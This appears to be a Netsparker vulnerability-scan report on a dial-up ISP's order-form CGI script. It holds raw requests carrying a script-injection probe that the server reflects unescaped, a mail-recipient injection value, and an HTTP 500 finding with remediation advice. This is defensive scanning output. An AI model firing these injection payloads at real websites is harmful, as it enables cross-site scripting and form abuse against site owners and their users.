html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x000CB9)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST DE
ZIP POST 3
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
CREDIT-CARD-EXPIRATION POST selectmonth
CreditCard+Billing+Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard+Billing+ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName & Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12762
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CB9)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=DE&ZIP=3&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&CREDIT-CARD-EXPIRATION=selectmonth&CreditCard+Billing+Address=3&billingcity=3&billingstate=3&CreditCard+Billing+ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 04:17:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x000CB9)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST DESIREDUSERNAME,DESIREDPASSWORD,TERM,CARD-HOLDER-NAME,NAME,ADDRESS,CITY,STATE,ZIP,PHONE,email,INITIALS
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST ns:netsparker056650=vuln
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST Select a State/province
ZIP POST 3
COUNTRY POST 3
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit Card Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectyear
CreditCard Billing Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard Billing ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName &amp; Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. 